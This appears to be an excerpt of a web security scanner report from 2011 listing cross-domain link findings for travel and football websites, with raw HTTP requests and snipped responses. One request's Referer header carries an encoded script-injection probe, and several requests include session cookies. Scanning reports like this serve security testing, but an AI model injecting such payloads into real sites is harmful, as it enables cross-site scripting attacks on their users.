...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-7.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-7.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Lobby" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-8.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-8.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Lobby" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Guest-Room-2.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Guest-Room-2.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Guest-Room" />
</a>
...[SNIP]...
</strong>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    </li>
...[SNIP]...
</strong>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    </li>
...[SNIP]...
<div class="lowAvailability">
    <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/itinerary/hotel/actfast/LSA_Arrow-1.png" alt="" height="15" width="15" />
    <span>
...[SNIP]...
<div class="lowAvailability">
    <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/itinerary/hotel/actfast/LSA_Arrow-1.png" alt="" height="15" width="15" />
    <span>
...[SNIP]...
<noscript>
                        <img src="http://maps.google.com/maps/api/staticmap?maptype=roadmap&size=530x300&markers=42.3513,-71.0704&zoom=14&language=en&sensor=false&client=gme-orbitz&signature=yWuJAdFz-8s5spAeim0yQT4yMB4=" alt="" />
</noscript>
...[SNIP]...
<p class="reviewApprovalOverview">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <span class="pctApproval">
...[SNIP]...
<span>Only show reviews by <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    Verified Customers</span>
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/notRecommended/large/ORB_ReviewsNotRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<h6>
                        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/tip/medium/Tip_med-1.png" alt="" height="17" width="17" />
    Dining tip:
                       <span>
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/notRecommended/large/ORB_ReviewsNotRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-GB">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<h6>
                        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/tip/medium/Tip_med-1.png" alt="" height="17" width="17" />
    Sightseeing tip:
                       <span>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png" alt="Call us to book 1-866-672-4895" height="60" width="200" />
    </div>
...[SNIP]...
<div class="map staticMap">
                <img src="http://maps.google.com/maps/api/staticmap?maptype=roadmap&size=196x88&markers=42.3513,-71.0704&zoom=14&language=en&sensor=false&client=gme-orbitz&signature=BhOD5eVot_Og3njneU31pKtBBKI=" alt="" />
</div>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>

               
            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<!-- [/standard Advert: 120x55_footer]    -->
<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.orbitz.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<noscript>
            <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />                
           </noscript>
...[SNIP]...
19.240. http://www.premierleague.com/page/SearchResults/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/SearchResults/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Players/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.3.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tabPreferences5102=0; s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/Players%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520document.getElementById%252528%252527categorySearchForm%252527%252529.submit%252528%252529%25257D%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Expires: Sun, 02 Oct 2011 23:53:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:53:13 GMT
Content-Length: 60029
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows03 at 03 10 2011 00:53:13 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div><img src="http://a.analytics.yahoo.com/p.pl?a=1000441932162&js=no" width="1" height="1" alt="" /></div>
...[SNIP]...
<div class="layout barclaysAD">
<a href="http://www.barclays.co.uk" target="_blank"><img width="986" height="48" alt="Barclays" src="http://www.premierleague.com/javaImages/6e/a0/0,,12306~3317870,00.gif" />
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|327|2816968|0|1|ADTECH;loc=300;sub1=[subst];grp=[group]" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|327|2816968|0|1|ADTECH;loc=300;grp=[group]" border="0" width="468" height="60"></a>
...[SNIP]...
<li class="clubArsenal"><a href="http://www.arsenal.com" target="_blank"><img src="/javaImages/61/f3/0,,12306~3339105,00.gif" alt="Arsenal Football Club" title="Arsenal Football Club">
...[SNIP]...
<li><a href="http://www.avfc.co.uk" target="_blank"><img src="/javaImages/62/f3/0,,12306~3339106,00.gif" alt="Aston Villa Football Club" title="Aston Villa Football Club">
...[SNIP]...
<li><a href="http://www.rovers.co.uk" target="_blank"><img src="/javaImages/65/f3/0,,12306~3339109,00.gif" alt="Blackburn Rovers Football Club" title="Blackburn Rovers Football Club">
...[SNIP]...
<li><a href="http://www.bwfc.co.uk" target="_blank"><img src="/javaImages/67/f3/0,,12306~3339111,00.gif" alt="Bolton Wanderers Football Club" title="Bolton Wanderers Football Club">
...[SNIP]...
<li><a href="http://www.chelseafc.com" target="_blank"><img src="/javaImages/68/f3/0,,12306~3339112,00.gif" alt="Chelsea Football Club" title="Chelsea Football Club">
...[SNIP]...
<li><a href="http://www.evertonfc.com" target="_blank"><img src="/javaImages/6b/f3/0,,12306~3339115,00.gif" alt="Everton Football Club" title="Everton Football Club">
...[SNIP]...
<li><a href="http://www.fulhamfc.com" target="_blank"><img src="/javaImages/6c/f3/0,,12306~3339116,00.gif" alt="Fulham Football Club" title="Fulham Football Club">
...[SNIP]...
<li><a href="http://www.liverpoolfc.tv" target="_blank"><img src="/javaImages/6e/f3/0,,12306~3339118,00.gif" alt="Liverpool Football Club" title="Liverpool Football Club">
...[SNIP]...
<li><a href="http://www.mcfc.co.uk" target="_blank"><img src="/javaImages/70/f3/0,,12306~3339120,00.gif" alt="Manchester City Football Club" title="Manchester City Football Club">
...[SNIP]...
<li><a href="http://www.manutd.com" target="_blank"><img src="/javaImages/72/f3/0,,12306~3339122,00.gif" alt="Manchester United Football Club" title="Manchester United Football Club">
...[SNIP]...
<li><a href="http://www.nufc.co.uk" target="_blank"><img src="/javaImages/76/92/0,,12306~8819318,00.gif" alt="Newcastle United Football Club" title="Newcastle United Football Club">
...[SNIP]...
<li><a href="http://www.canaries.co.uk" target="_blank"><img src="/javaImages/c6/78/0,,12306~9730246,00.jpg" alt="Norwich City Football Club" title="Norwich City Football Club">
...[SNIP]...
<li><a href="http://www.qpr.co.uk" target="_blank"><img src="/javaImages/c7/78/0,,12306~9730247,00.jpg" alt="Queens Park Rangers Football Club" title="Queens Park Rangers Football Club">
...[SNIP]...
<li><a href="http://www.stokecityfc.com" target="_blank"><img src="/javaImages/c1/46/0,,12306~3688129,00.gif" alt="Stoke City Football Club" title="Stoke City Football Club">
...[SNIP]...
<li><a href="http://www.safc.com" target="_blank"><img src="/javaImages/78/f3/0,,12306~3339128,00.gif" alt="Sunderland AFC" title="Sunderland AFC">
...[SNIP]...
<li><a href="http://www.swanseacity.net" target="_blank"><img src="/javaImages/c8/78/0,,12306~9730248,00.jpg" alt="Swansea City Football Club" title="Swansea City Football Club">
...[SNIP]...
<li><a href="http://www.tottenhamhotspur.com" target="_blank"><img src="/javaImages/79/f3/0,,12306~3339129,00.gif" alt="Tottenham Hotspur Football Club" title="Tottenham Hotspur Football Club">
...[SNIP]...
<li class="clubWestBrom"><a href="http://www.wba.co.uk" target="_blank"><img src="/javaImages/77/92/0,,12306~8819319,00.gif" alt="West Bromwich Albion Football Club" title="West Bromwich Albion Football Club">
...[SNIP]...
<li class="clubWigan"><a href="http://www.wiganlatics.co.uk" target="_blank"><img src="/javaImages/7b/f3/0,,12306~3339131,00.gif" alt="Wigan Athletic Football Club" title="Wigan Athletic Football Club">
...[SNIP]...
<li>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.wolves.co.uk" target="_blank"><img src="/javaImages/c6/9f/0,,12306~6004678,00.gif" alt="Wolverhampton Wanderers Football Club" title="Wolverhampton Wanderers Football Club">
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|327|2816969|0|170|ADTECH;loc=300;sub1=[subst];grp=[group]" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|327|2816969|0|170|ADTECH;loc=300;grp=[group]" border="0" width="300" height="250"></a>
...[SNIP]...
<div class="layout skyAds">
<a href="http://www.barclays.co.uk" target="_blank"><img width="120" height="29" alt="Barclays Premier League" src="http://www.premierleague.com/javaImages/8d/92/0,,12306~3314317,00.gif" />
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|327|2816967|0|168|ADTECH;loc=300;sub1=[subst];grp=[group]" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|327|2816967|0|168|ADTECH;loc=300;grp=[group]" border="0" width="120" height="600"></a>
...[SNIP]...
<div class="PL_barc">
<a href="http://www.barclays.co.uk/" target="blank_">
<img src="/javaImages/c5/34/0,,12306~5518533,00.gif" alt="Barclays">
...[SNIP]...
<div align="center">
<img src="http://www.personal.barclays.co.uk/PFS/A/Content/Images/pleague-arrow-1.gif" alt="*" />
<a target="_blank" href="http://www.barclays.co.uk/Currentaccounts/P1242557963414" style="color: rgb(78, 188, 235); text-decoration: none">
<strong>
...[SNIP]...
</a>
<img src="http://www.personal.barclays.co.uk/PFS/A/Content/Images/pleague-arrow-1.gif" alt="*" />
<a target="_blank" href="http://www.barclays.co.uk/Savings/ISAs/H1242557860616?selectedGroupName=ISAs" style="color: rgb(78, 188, 235); text-decoration: none">
<strong>
...[SNIP]...
</a>
<img src="http://www.personal.barclays.co.uk/PFS/A/Content/Images/pleague-arrow-1.gif" alt="*" />
<a target="_blank" href="http://www.barclays.co.uk/Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121" style="color: rgb(78, 188, 235); text-decoration: none">
<strong>
...[SNIP]...
<div class="PL_col2_left">
<a href="http://www.easportsfootball.com" target="blank_">
<img src="/javaImages/87/81/0,,12306~8946055,00.gif" alt="EA SPORTS">
...[SNIP]...
<div class="PL_col2_middle">
<a href="http://www.nikefootball.com" target="blank_">
<img src="/javaImages/5f/9f/0,,12306~8822623,00.gif" alt="Nike">
...[SNIP]...
<div class="PL_col2_right">
<a href="http://www.footballpools.com" target="blank_">
<img src="/javaImages/79/1c/0,,12306~8985721,00.jpg" alt="Football Pools">
...[SNIP]...
<div class="PL_bottomMainAds">
<a href="http://www.likeaballs.com/" target="blank_">
<img src="/javaImages/82/f4/0,,12306~5043330,00.gif" alt="Likeaballs">
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...
19.241. http://www.sabrehospitality.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?esiteurl=sabrehospitalitysolutions.com HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabre.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17374


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <!-- cmt id="meta
...[SNIP]...
</div>        
               <object id="flash" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="2000" height="600">
                   <param name="movie" value="/flash/home-masthead.swf" />
...[SNIP]...
<li id="utility-sabre"><a href="http://sabre-holdings.com/">Sabre Holdings</a>
...[SNIP]...
<li id="follow-facebook"><a href="http://www.facebook.com/SabreHospitality" class="track" name="follow:facebook" target="_blank"><span class="alt">
...[SNIP]...
<li id="follow-twitter"><a href="http://twitter.com/SabreHosp" class="track" name="follow:twitter" target="_blank"><span class="alt">
...[SNIP]...
<li id="follow-linked"><a target="_blank" href="http://www.linkedin.com/companies/sabre-hospitality-solutions" class="track" name="follow:linkedin"><span class="alt">
...[SNIP]...
</strong> While using our site, you may encounter some trouble along the way. For PC users, we recommend upgrading to the latest version of <a href="http://www.microsoft.com/windows/products/winfamily/ie/default.mspx" rel="nofollow">Internet Explorer</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>. For Mac users, we recommend the latest version of <a href="http://www.apple.com/macosx/features/safari/" rel="nofollow">Safari</a> or <a href="http://www.mozilla.com/en-US/firefox/" rel="nofollow">Firefox</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://calls.esitemarketing.com/euinc/number-changer.js"></script>
...[SNIP]...
19.242. http://www.sabretravelnetwork.com/home/search/show_results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621500; expires=Tue, 02-Oct-2012 00:58:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</form>
                   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...
<li><a href="http://www.sabretravelnetwork.ru" class="ex">..............</a>
...[SNIP]...
</span><a href="http://www.abacus.com.sg" class="ex"> Abacus - English</a>
...[SNIP]...
</span> <a href="http://www.sabrepacific.com.au" class="ex">Sabre Pacific - English</a>
...[SNIP]...
<p>Calculate and compare fee totals from the most popular airlines in the US. <a href="http://www.exploreflightfees.com/">Bookmark Us</a>
...[SNIP]...
<p>Committed to minimizing the environmental impact of our global operations and to promoting sustainable business practices in travel and tourism. <a href="http://www.sabre-holdings.com/aboutUs/corporate/sustainability.html">www.sabre-holdings.com</a>
...[SNIP]...
</a>
           <a href="http://www.sabre-holdings.com/careers/index.html" class="right">Careers</a>
           <a href="http://www.sabre-holdings.com" class="right">Sabre Holdings</a>
...[SNIP]...
19.243. http://www.travelocity.com/popWindow2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9512
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:50 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
</div>

   <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/mbox.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jQuery/1.4.3/jquery-1.4.3.min.js"></script>
...[SNIP]...
19.244. http://www.trip.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:01 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "ab4c-4ad908dfe6d00"
Accept-Ranges: bytes
ntCoent-Length: 43852
Content-Type: text/html
Cache-Control: private
Content-Length: 43852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Cheap Flights, Hotels &amp; Trips | Trip.com</title>
...[SNIP]...
<meta name="msvalidate.01" content="F4183A542954B39E862C81CCFCEDFA0E" />
<link rel="stylesheet" href="http://media.away.com/trip/css/trip-landing-min.css" type="text/css" />
<script type="text/javascript">
